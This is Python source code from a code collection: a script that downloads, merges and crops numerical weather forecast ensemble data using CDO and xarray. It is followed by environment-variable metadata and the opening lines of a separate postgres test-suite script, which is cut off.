data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],)
# Set data outcome global
data_outcome_global = set_data_outcome(
time_run_step, ens_member,
data_settings['data']['dynamic']['outcome']['global'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_global'])
# Set data outcome domain
data_outcome_domain = set_data_outcome(
time_run_step, ens_member,
data_settings['data']['dynamic']['outcome']['domain'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_domain'])
if data_settings['algorithm']['flags']['downloading_mp']:
retrieve_data_source_mp(
data_source, data_ancillary,
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_ancillary'],
process_n=data_settings['algorithm']['ancillary']['process_mp'], limit=data_settings['algorithm']['ancillary']['remote_server_hit_per_min'])
else:
retrieve_data_source_seq(
data_source, data_ancillary,
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_ancillary'], limit=data_settings['algorithm']['ancillary']['remote_server_hit_per_min'])
# Merge and mask data ancillary to data outcome
arrange_data_outcome(data_ancillary, data_outcome_global, data_outcome_domain,
data_bbox=data_settings['data']['static']['bounding_box'],
cdo_exec=data_settings['algorithm']['ancillary']['cdo_exec'],
cdo_deps=data_settings['algorithm']['ancillary']['cdo_deps'],
source_standards=data_settings['data']['dynamic']['source']['vars_standards'],
date_range=time_data_full)
# Clean data tmp (such as ancillary and outcome global)
clean_data_tmp(
data_ancillary, data_outcome_global,
flag_cleaning_tmp=data_settings['algorithm']['flags']['cleaning_dynamic_data_tmp'])
logging.info(' ---> ENSEMBLE MEMBER: ' + str(ens_member).zfill(2) + ' ... DONE')
# Ending info
logging.info(' ---> NWP RUN: ' + str(time_run_step) + ' ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Info algorithm
time_elapsed = round(time.time() - start_time, 1)
logging.info(' ')
logging.info(' ==> ' + alg_name + ' (Version: ' + alg_version + ' Release_Date: ' + alg_release + ')')
logging.info(' ==> TIME ELAPSED: ' + str(time_elapsed) + ' seconds')
logging.info(' ==> ... END')
logging.info(' ==> Bye, Bye')
logging.info(' ============================================================================ ')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to check source url(s)
def check_url_source(src_data, src_code_exist=200, process_n=20, process_max=None):
logging.info(' ----> Checking source url(s) ... ')
if process_max is None:
process_max = cpu_count() - 1
if process_n > process_max:
logging.warning(' ----> Maximum of recommended processes must be less then ' + str(process_max))
logging.warning(' ----> Set number of process from ' + str(process_n) + ' to ' + str(process_max))
process_n = process_max
src_response_list = []
src_key_list = []
for src_data_key, src_data_list in src_data.items():
logging.info(' -----> Source ' + src_data_key + ' ... ')
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
src_response = process_pool.map(request_url, src_data_list, chunksize=1)
process_pool.close()
process_pool.join()
src_response_list.append(src_response)
src_key_list.append(src_data_key)
logging.info(' -----> Source ' + src_data_key + ' ... DONE')
for src_key_step, src_response_step in zip(src_key_list, src_response_list):
if not all(src_code_el == src_code_exist for src_code_el in src_response_step):
logging.warning(' ===> Some url(s) for source ' + src_key_step + ' are not available!')
logging.info(' ----> Checking source url(s) ... FAILED')
return False
logging.info(' ----> Checking source url(s) ... DONE')
return True
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to request url
def request_url(src_url):
logging.getLogger('requests').setLevel(logging.CRITICAL)
src_request = Request(src_url)
try:
src_response = urlopen(src_request)
return src_response.code
except URLError as e:
if hasattr(e, 'reason'):
logging.warning(' ===> URL is unreachable from server.')
logging.warning(' ===> URL: ', src_url[0])
return False
elif hasattr(e, 'code'):
logging.warning(' ===> The server couldn\'t fulfill the request.')
logging.warning(' ===> URL: ', src_url[0])
return False
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to clean tmp data such as ancillary or global (if domain is set)
def clean_data_tmp(data_ancillary, data_outcome_global,
flag_cleaning_tmp=False):
if flag_cleaning_tmp:
for data_key, data_value in data_ancillary.items():
for data_step in data_value:
if os.path.exists(data_step):
os.remove(data_step)
for data_key, data_value in data_outcome_global.items():
for data_step in data_value:
if os.path.exists(data_step):
os.remove(data_step)
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to merge and mask outcome dataset(s)
def arrange_data_outcome(src_data, dst_data_global, dst_data_domain,
data_bbox=None, cdo_exec=None, cdo_deps=None, source_standards=None, date_range=None):
logging.info(' ----> Dumping data ... ')
if data_bbox is not None:
bbox_lon_right = str(data_bbox['lon_right'])
bbox_lon_left = str(data_bbox['lon_left'])
bbox_lat_top = str(data_bbox['lat_top'])
bbox_lat_bottom = str(data_bbox['lat_bottom'])
bbox_points = [bbox_lon_left, bbox_lon_right, bbox_lat_bottom, bbox_lat_top]
bbox_cdo = ','.join(bbox_points)
else:
bbox_cdo = None
if cdo_exec is None:
logging.error(' ===> CDO executable is not set!')
raise RuntimeError(' CDO executable is not set!')
for cdo_dep in cdo_deps:
os.environ['LD_LIBRARY_PATH'] = 'LD_LIBRARY_PATH:' + cdo_dep
#temp for local debug
os.environ['PATH'] = os.environ['PATH'] + ':/home/andrea/FP_libs/fp_libs_cdo/cdo-1.9.8_nc-4.6.0_hdf-1.8.17_eccodes-2.17.0/bin/'
cdo = Cdo()
cdo.setCdo(cdo_exec)
for (src_key_step, src_data_step), \
(dst_key_global_step, dst_data_global_step), (dst_key_domain_step, dst_data_domain_step) in \
zip(src_data.items(), dst_data_global.items(), dst_data_domain.items()):
logging.info(' -----> Type ' + src_key_step + ' ... ')
src_data_step.sort()
if isinstance(dst_data_global_step, list):
dst_data_global_step = dst_data_global_step[0]
if isinstance(dst_data_domain_step, list):
dst_data_domain_step = dst_data_domain_step[0]
folder_data_global_step, filename_data_global_step = os.path.split(dst_data_global_step)
tmp_data_global_step_cat = create_filename_tmp(folder=folder_data_global_step, suffix='.grib2')
tmp_data_global_step_seltimestep = create_filename_tmp(folder=folder_data_global_step, suffix='.grib2')
tmp_data_global_step_convert = create_filename_tmp(folder=folder_data_global_step, suffix='.nc')
logging.info(' ------> Merge, convert and project data ... ')
if not os.path.exists(dst_data_global_step):
cdo.cat(input=src_data_step, output=tmp_data_global_step_cat, options='-r')
info_file = cdo.infov(input=tmp_data_global_step_cat)
# Explore available variable in the grib file, skiping rows with headers and footers
var_in_all = [i.split(':')[-1].replace(' ','') for i in cdo.infov(input=tmp_data_global_step_cat) if i.split(':')[0].replace(' ','').isnumeric()]
var_in = np.unique(var_in_all)
logging.info(' ------> Var(s) found in file: ' + ','.join(var_in))
step_expected = int(src_data_step.__len__()*len(var_in))
step_get = len(var_in_all)
if step_get > step_expected:
step_ratio = int(step_get / step_expected)
var_select_cdo, timestep_select_cdo = select_time_steps(
info_file, id_start=step_ratio, id_end=step_get, id_period=step_ratio)
cdo.seltimestep(timestep_select_cdo, input=tmp_data_global_step_cat, output=tmp_data_global_step_seltimestep)
else:
if os.path.exists(tmp_data_global_step_seltimestep):
os.remove(tmp_data_global_step_seltimestep)
tmp_data_global_step_seltimestep = tmp_data_global_step_cat
cdo.copy(input=tmp_data_global_step_seltimestep, output=tmp_data_global_step_convert, options="-f nc4")
cdo.sellonlatbox('-180,180,-90,90', input=tmp_data_global_step_convert, output=dst_data_global_step)
if not source_standards == None:
if source_standards['convert2standard_continuum_format']:
out_file = deepcopy(xr.open_dataset(dst_data_global_step))
time_range_full = pd.date_range(min(out_file["time"].values),max(out_file["time"].values),freq='H')
os.remove(dst_data_global_step)
if '2t' in var_in.tolist():
if source_standards['source_temperature_mesurement_unit'] == 'C':
pass
elif source_standards['source_temperature_mesurement_unit'] == 'K':
logging.info(' ------> Convert temperature to C ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
out_file['2t_C'] = out_file['2t'] - 273.15
out_file['2t_C'].attrs['long_name'] = '2 metre temperature'
out_file['2t_C'].attrs['units'] = 'C'
out_file['2t_C'].attrs['standard_name'] = "air_temperature"
out_file = out_file.rename({'2t': '2t_K'})
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Convert temperature to C ... DONE')
else:
raise NotImplementedError
if 'tp' in var_in.tolist() and source_standards['source_precipitation_is_cumulated'] is True:
logging.info(' ------> Decumulate precipitation ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
#os.remove(dst_data_global_step)
temp = np.diff(out_file['tp'].values, n=1, axis=0, prepend=0)
out_file['tp'][np.arange(2,out_file['tp'].values.shape[0],2),:,:].values = temp[np.arange(2,out_file['tp'].values.shape[0],2),:,:]
out_file['tp'].values = out_file['tp'].values/3
out_file['tp'].attrs['long_name'] = 'hourly precipitation depth'
out_file['tp'].attrs['units'] = 'mm'
out_file['tp'].attrs['standard_name'] = "precipitation"
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Decumulate precipitation ... DONE')
if '10u' in var_in.tolist() and source_standards['source_wind_separate_components'] is True:
logging.info(' ------> Combine wind component ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
#os.remove(dst_data_global_step)
out_file['10wind'] = np.sqrt(out_file['10u']**2 + out_file['10v']**2)
out_file['10wind'].attrs['long_name'] = '10 m wind'
out_file['10wind'].attrs['units'] = 'm s**-1'
out_file['10wind'].attrs['standard_name'] = "wind"
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Combine wind component ... DONE')
# out_file = deepcopy(xr.open_dataset(dst_data_global_step))
# os.remove(dst_data_global_step)
# Check if file has "heigth" dimension and remove it
try:
out_file = out_file.squeeze(dim="height", drop=True)
out_file = out_file.squeeze(dim="height_2", drop=True)
logging.info(' ------> Remove height dimensions ... ')
except:
pass
# Reindex time axis by padding last available map over the time range
out_file=out_file.reindex(time=date_range, method='nearest')
out_file.to_netcdf(dst_data_global_step)
if os.path.exists(tmp_data_global_step_cat):
os.remove(tmp_data_global_step_cat)
if os.path.exists(tmp_data_global_step_seltimestep):
os.remove(tmp_data_global_step_seltimestep)
if os.path.exists(tmp_data_global_step_convert):
os.remove(tmp_data_global_step_convert)
logging.info(' ------> Merge, convert and project data ... DONE')
else:
logging.info(' ------> Merge, convert and project data ... SKIPPED. Data already merged.')
logging.info(' ------> Mask data over domain ... ')
if not os.path.exists(dst_data_domain_step):
if bbox_cdo is not None:
cdo.sellonlatbox(bbox_cdo, input=dst_data_global_step, output=dst_data_domain_step)
logging.info(' ------> Mask data over domain ... DONE')
else:
logging.info(' ------> Mask data over domain ... SKIPPED. Domain bounding box not defined.')
else:
logging.info(' ------> Mask data over domain ... SKIPPED. Data already masked.')
logging.info(' -----> Type ' + src_key_step + ' ... DONE')
logging.info(' ----> Dumping data ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to drop data
def select_time_steps(info_file, id_start=2, id_end=None, id_period=2):
if id_end is None:
id_end = int(info_file[-1].split()[0])
list_vars = []
for info_row in info_file[:-1]:
info_list = info_row.split()
info_id = int(info_list[0])
info_var = info_list[12]
if info_id >= 0:
list_vars.append(info_var)
var_box = list(set(list_vars))
ids_info = [str(id_start), str(id_end), str(id_period)]
ids_box = '/'.join(ids_info)
return var_box, ids_box
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create a tmp name
def create_filename_tmp(prefix='gfs_tmp_', suffix='.grib2', folder=None):
if folder is None:
folder = '/tmp'
with tempfile.NamedTemporaryFile(dir=folder, prefix=prefix, suffix=suffix, delete=False) as tmp:
temp_file_name = tmp.name
return temp_file_name
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to retrieve and store data (multiprocess)
def retrieve_data_source_mp(src_data, dst_data, flag_updating=False, process_n=20, process_max=None, limit=9999):
logging.info(' ----> Downloading data in multiprocessing mode ... ')
if process_max is None:
process_max = cpu_count() - 1
if process_n > process_max:
logging.warning(' ----> Maximum of recommended processes must be less then ' + str(process_max))
logging.warning(' ----> Set number of process from ' + str(process_n) + ' to ' + str(process_max))
process_n = process_max
data_list = []
data_check = []
for (src_data_key, src_data_list), (dst_data_key, dst_data_list) in zip(src_data.items(), dst_data.items()):
for src_step_url, dst_step_path in zip(src_data_list, dst_data_list):
dst_step_root, dst_step_file = split(dst_step_path)
make_folder(dst_step_root)
if exists(dst_step_path) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and (not flag_updating):
flag_updating = True
if flag_updating:
data_list.append([src_step_url, dst_step_path])
data_check.append([src_step_url, dst_step_path])
if len(data_list)>limit:
for i in range(0,len(data_list),limit):
max_available = min(i + limit, len(data_list))
chunk = data_list[i:i + limit]
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
_ = process_pool.map(request_data_source, chunk, chunksize=1)
process_pool.close()
process_pool.join()
logging.info(' ----> Wait 60 seconds for next requests ...')
time.sleep(60)
if max_available<len(data_list):
logging.info(' ----> ' + str(int(100*max_available/len(data_list))) + ' % complete...')
logging.info(' ----> Continue with next chunk of requests...')
else:
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
_ = process_pool.map(request_data_source, data_list, chunksize=1)
process_pool.close()
process_pool.join()
find_data_corrupted(data_check)
logging.info(' ----> Downloading data in multiprocessing mode ... DONE')
# -------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------
# Method to find outliers and to retry for downloading data again
def find_data_corrupted(data_list, data_perc_min=5, data_size_min=100000):
logging.info(' -----> Checking for corrupted or unavailable data ... ')
data_size = []
idx_nodata = []
for dst_id, dst_step_path in enumerate(data_list):
if os.path.exists(dst_step_path[1]):
dst_step_size = os.path.getsize(dst_step_path[1])
else:
dst_step_size = 0
idx_nodata.append(dst_id)
data_size.append(dst_step_size)
data_size = np.asarray(data_size)
data_p_min = np.percentile(data_size, data_perc_min)
idx_false = np.where(data_size < min([data_size_min, data_p_min]))[0]
idx_nodata = np.asarray(idx_nodata, int)
idx_retry = np.unique(np.concatenate((idx_false, idx_nodata), axis=0))
for idx_step in idx_retry:
data_false = data_list[idx_step]
if os.path.exists(data_false[1]):
os.remove(data_false[1])
logging.info(' ------> Downloading data ' + split(data_false[1])[1] + ' ... ')
request_data_source(data_false)
logging.info(' ------> Downloading data ' + split(data_false[1])[1] + ' ... DONE')
logging.info(' -----> Checking for corrupted or unavailable data ... DONE')
# ------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to request data using a source url and a destination filename
def request_data_source(data_list):
logging.info(' :: Http request for downloading: ' + data_list[0] + ' ... ')
logging.info(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... ')
try:
urllib.request.urlretrieve(data_list[0], filename=data_list[1])
logging.info(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... DONE')
logging.info(' :: Http request for downloading: ' + data_list[0] + ' ... DONE')
return True
except IOError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. IO error.')
raise IOError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Data Not available on the server.')
except ConnectionResetError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Reset error')
raise ConnectionResetError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Reset error')
except ConnectionAbortedError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connetction Aborted error.')
raise ConnectionAbortedError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connetction Aborted error.')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to retrieve and store data (sequential)
def retrieve_data_source_seq(src_data, dst_data, flag_updating=False, limit=9999):
logging.info(' ----> Downloading data in sequential mode ... ')
data_list = []
data_check = []
hit_count = 0
for (src_data_key, src_data_list), (dst_data_key, dst_data_list) in zip(src_data.items(), dst_data.items()):
logging.info(' -----> DataType: ' + src_data_key + ' ... ')
for src_step_url, dst_step_path in zip(src_data_list, dst_data_list):
dst_step_root, dst_step_file = split(dst_step_path)
make_folder(dst_step_root)
logging.info(' ------> Save data in file: ' + str(dst_step_file) + ' ... ')
if exists(dst_step_path) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and (not flag_updating):
flag_updating = True
if flag_updating:
request_data_source([src_step_url, dst_step_path])
hit_count += 1
data_list.append([src_step_url, dst_step_path])
logging.info(' -------> Save data in file: ' + str(dst_step_file) + ' ... DONE')
if hit_count == limit:
logging.info(' ----> Wait 60 seconds for next requests ...')
time.sleep(60)
hit_count = 0
logging.info(' ----> Continue with next chunk of requests...')
else:
logging.info(' ------> Save data in file: ' + str(dst_step_file) +
' ... SKIPPED. File saved previously')
data_check.append([src_step_url, dst_step_path])
logging.info(' -----> DataType: ' + src_data_key + ' ... DONE')
find_data_corrupted(data_check)
logging.info(' ----> Downloading data in sequential mode ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data outcome list
def set_data_outcome(time_run, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, flag_updating=True):
if type_data is None:
type_data = ["surface"]
folder_list = data_def['folder']
filename_list = data_def['filename']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
file_ws = {}
for folder_raw, filename_raw, type_step in zip(folder_list, filename_list, type_data):
file_list = []
tags_values_step = {"domain": domain,
"outcome_sub_path_time": datetime_run, "outcome_datetime": datetime_run,
"run_hour": hour_run, "run_step": 0,
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member" : ens_member}
folder_step = fill_tags2string(folder_raw, tags_template, tags_values_step)
filename_step = fill_tags2string(filename_raw, tags_template, tags_values_step)
path_step = join(folder_step, filename_step)
if flag_updating:
if os.path.exists(path_step):
os.remove(path_step)
if not os.path.exists(folder_step):
make_folder(folder_step)
file_list.append(path_step)
file_ws[type_step] = file_list
return file_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data ancillary list
def set_data_ancillary(time_run, time_range, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, anl_include=False):
if type_data is None:
type_data = ["surface"]
folder_list = data_def['folder']
filename_list = data_def['filename']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
file_ws = {}
for folder_raw, filename_raw, type_step in zip(folder_list, filename_list, type_data):
file_list = []
for time_id, time_step in enumerate(time_range):
if not anl_include:
time_id = time_id + 1
datetime_step = time_step.to_pydatetime()
tags_values_step = {"domain": domain,
"ancillary_sub_path_time": datetime_run, "ancillary_datetime": datetime_step,
"run_hour": hour_run, "run_step": time_id,
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member": ens_member}
folder_step = fill_tags2string(folder_raw, tags_template, tags_values_step)
filename_step = fill_tags2string(filename_raw, tags_template, tags_values_step)
path_step = join(folder_step, filename_step)
file_list.append(path_step)
file_ws[type_step] = file_list
return file_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data source list
def set_data_source(time_run, time_range, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, anl_include=False):
if type_data is None:
type_data = ["surface"]
url_root_list = data_def['url_root']
url_file_list = data_def['url_file']
url_lev_list = data_def['url_lev']
url_vars_list = data_def['url_vars']
url_bbox_list = data_def['url_bbox']
url_loc_list = data_def['url_loc']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
frc_steps = (time_range - time_run).total_seconds()/3600
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
url_ws = {}
for url_root_raw, url_file_raw, url_lev_raw, url_vars_raw, url_bbox_raw, url_loc_raw, type_step in zip(
url_root_list, url_file_list, url_lev_list, url_vars_list, url_bbox_list, url_loc_list, type_data):
if url_bbox_raw is None:
url_bbox_raw = ''
url_list = []
for time_id, time_step in zip(frc_steps, time_range):
datetime_step = time_step.to_pydatetime()
tags_values_step = {"domain": domain,
"outcome_sub_path_time": datetime_run, "outcome_datetime": datetime_step,
"run_hour": hour_run, "run_step": int(time_id),
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member": ens_member}
url_root_step = fill_tags2string(url_root_raw, tags_template, tags_values_step)
url_file_step = fill_tags2string(url_file_raw, tags_template, tags_values_step)
url_lev_step = fill_tags2string(url_lev_raw, tags_template, tags_values_step)
url_vars_step = fill_tags2string(url_vars_raw, tags_template, tags_values_step)
url_bbox_step = fill_tags2string(url_bbox_raw, tags_template, tags_values_step)
url_loc_step = fill_tags2string(url_loc_raw, tags_template, tags_values_step)
url_step = url_root_step + url_file_step + url_lev_step + url_vars_step + url_bbox_step + url_loc_step
url_list.append(url_step)
url_ws[type_step] = url_list
return url_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to add time in a unfilled string (path or filename)
def fill_tags2string(string_raw, tags_format=None, tags_filling=None):
apply_tags = False
if string_raw is not None:
for tag in list(tags_format.keys()):
if tag in string_raw:
apply_tags = True
break
if apply_tags:
tags_format_tmp = deepcopy(tags_format)
for tag_key, tag_value in tags_format.items():
tag_key_tmp = '{' + tag_key + '}'
if tag_value is not None:
if tag_key_tmp in string_raw:
string_filled = string_raw.replace(tag_key_tmp, tag_value)
string_raw = string_filled
else:
tags_format_tmp.pop(tag_key, None)
for tag_format_name, tag_format_value in list(tags_format_tmp.items()):
if tag_format_name in list(tags_filling.keys()):
tag_filling_value = tags_filling[tag_format_name]
if tag_filling_value is not None:
if isinstance(tag_filling_value, datetime):
tag_filling_value = tag_filling_value.strftime(tag_format_value)
if isinstance(tag_filling_value, (float, int)):
tag_filling_value = tag_format_value.format(tag_filling_value)
string_filled = string_filled.replace(tag_format_value, tag_filling_value)
string_filled = string_filled.replace('//', '/')
return string_filled
else:
return string_raw
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to define data time range
def set_data_time(time_step, time_settings):
time_period_obs = time_settings['time_observed_period']
time_period_for = time_settings['time_forecast_period']
time_freq_obs = time_settings['time_observed_frequency']
time_freq_for = time_settings['time_forecast_frequency']
time_step_obs = time_step
time_range_obs = pd.date_range(end=time_step_obs, periods=time_period_obs, freq=time_freq_obs)
time_step_for = pd.date_range([time_step][0], periods=2, freq=time_freq_for)[-1]
time_range_for = pd.date_range(start=time_step_for, periods=time_period_for, freq=time_freq_for)
time_range_data = time_range_obs.union(time_range_for)
return time_range_data
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to check time validity
def check_time_limit(time_alg, time_name='time_step', time_limit_period='9D', time_round='D'):
time_day = pd.Timestamp.today()
time_limit_upper = time_day.floor(time_round)
time_limit_lower = pd.date_range(end=time_limit_upper, periods=2, freq=time_limit_period)[0]
if time_alg < time_limit_lower:
logging.error(' ===> ' + time_name + ' is not available on source database! It is less then DB time_from')
raise IOError(time_name + ' is not correctly defined! Check your settings or algorithm args!')
elif time_alg > time_limit_upper:
logging.error(' ===> ' + time_name + ' is not available on source database! It is greater then DB time_to')
raise IOError(time_name + ' is not correctly defined! Check your settings or algorithm args!')
else:
pass
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to define run time range
def set_run_time(time_alg, time_settings):
time_set = time_settings['time_now']
time_freq = time_settings['time_frequency']
time_round = time_settings['time_rounding']
time_period = time_settings['time_period']
if time_period < 1:
time_period = 1
logging.warning(' ===> TimePeriod must be greater then zero! TimePeriod set to 1.')
if time_alg and time_set:
time_now = time_alg
elif time_alg is None and time_set:
time_now = time_set
elif time_alg and time_set is None:
time_now = time_alg
else:
logging.error(' ===> TimeNow is not correctly set!')
raise IOError('TimeNow is undefined! Check your settings or algorithm args!')
time_now_raw = pd.Timestamp(time_now)
time_now_round = time_now_raw.floor(time_round)
if time_period > 0:
time_range = pd.date_range(end=time_now_round, periods=time_period, freq=time_freq)
else:
logging.warning(' ===> TimePeriod must be greater then 0. TimePeriod is set automatically to 1')
time_range = pd.DatetimeIndex([time_now_round], freq=time_freq)
check_time_limit(time_now_round, time_name='time_now', time_round=time_round)
check_time_limit(time_range[0], time_name='time_run_from', time_round='H')
if time_period > 1:
check_time_limit(time_range[1], time_name='time_run_to', time_round='H')
else:
check_time_limit(time_range[0], time_name='time_run_to', time_round='H')
return time_now_round, time_range
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to make folder
def make_folder(path_folder):
if not exists(path_folder):
makedirs(path_folder)
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to read file json
def read_file_json(file_name):
env_ws = {}
for env_item, env_value in os.environ.items():
env_ws[env_item] = env_value
with open(file_name, "r") as file_handle:
json_block = []
for file_row in file_handle:
for env_key, env_value in env_ws.items():
env_tag = '$' + env_key
if env_tag in file_row:
env_value = env_value.strip("'\\'")
file_row = file_row.replace(env_tag, env_value)
file_row = file_row.replace('//', '/')
# Add the line to our JSON block
json_block.append(file_row)
# Check whether we closed our JSON block
if file_row.startswith('}'):
# Do something with the JSON dictionary
json_dict = json.loads(''.join(json_block))
# Start a new block
json_block = []
return json_dict
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to get script argument(s)
def get_args():
parser_handle = ArgumentParser()
parser_handle.add_argument('-settings_file', action="store", dest="alg_settings")
parser_handle.add_argument('-time', action="store", dest="alg_time")
parser_values = parser_handle.parse_args()
if parser_values.alg_settings:
alg_settings = parser_values.alg_settings
else:
alg_settings = 'configuration.json'
if parser_values.alg_time:
alg_time = parser_values.alg_time
else:
alg_time = None
return alg_settings, alg_time
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to set logging information
def set_logging(logger_file='log.txt', logger_format=None):
if logger_format is None:
logger_format = '%(asctime)s %(name)-12s %(levelname)-8s ' \
'%(filename)s:[%(lineno)-6s - %(funcName)20s()] %(message)s'
# Remove old logging file
if os.path.exists(logger_file):
os.remove(logger_file)
# Set level of root debugger
logging.root.setLevel(logging.DEBUG)
# Open logging basic configuration
logging.basicConfig(level=logging.DEBUG, format=logger_format, filename=logger_file, filemode='w')
# Set logger handle
logger_handle_1 = logging.FileHandler(logger_file, 'w')
logger_handle_2 = logging.StreamHandler()
# Set logger level
logger_handle_1.setLevel(logging.DEBUG)
logger_handle_2.setLevel(logging.DEBUG)
# Set logger formatter
logger_formatter = logging.Formatter(logger_format)
logger_handle_1.setFormatter(logger_formatter)
logger_handle_2.setFormatter(logger_formatter)
# Add handle to logging
logging.getLogger('').addHandler(logger_handle_1)
logging.getLogger('').addHandler(logger_handle_2)
# -------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# Call script from external library
if __name__ == "__main__":
main()
# ----------------------------------------------------------------------------
|
[] |
[] |
[
"LD_LIBRARY_PATH",
"PATH"
] |
[]
|
["LD_LIBRARY_PATH", "PATH"]
|
python
| 2 | 0 | |
test/postgres/suite.py
|
#!/usr/bin/env python
# encoding: utf-8
## ==============================================
## GOAL : Test initdb, pg_ctl start and stop
## ==============================================
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import sys
import shlex
import shutil
import tempfile
import os
import time
import logging
import platform
import unittest
import xmlrunner
from subprocess import Popen, PIPE
## ==============================================
## LOGGING CONFIGURATION
## ==============================================
LOG = logging.getLogger(__name__)
LOG_handler = logging.StreamHandler()
LOG_formatter = logging.Formatter(
fmt='%(asctime)s [%(funcName)s:%(lineno)03d] %(levelname)-5s: %(message)s',
datefmt='%m-%d-%Y %H:%M:%S'
)
LOG_handler.setFormatter(LOG_formatter)
LOG.addHandler(LOG_handler)
LOG.setLevel(logging.INFO)
## ==============================================
## CONFIGURATION
## ==============================================
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = reduce(os.path.join, [BASE_DIR, os.path.pardir, os.path.pardir])
BUILD_DIR = reduce(os.path.join, [ROOT_DIR, "build"])
# on Jenkins, we do not build in 'build' dir
if platform.node() == 'jenkins':
TOOLS_DIR = reduce(os.path.join, [ROOT_DIR, "tools"])
SRC_DIR = reduce(os.path.join, [ROOT_DIR, "src"])
else:
TOOLS_DIR = reduce(os.path.join, [BUILD_DIR, "tools"])
SRC_DIR = reduce(os.path.join, [BUILD_DIR, "src"])
LIB_DIR = reduce(os.path.join, [SRC_DIR, ".libs"])
my_env = os.environ.copy()
# Set the library path
if 'LD_LIBRARY_PATH' in my_env:
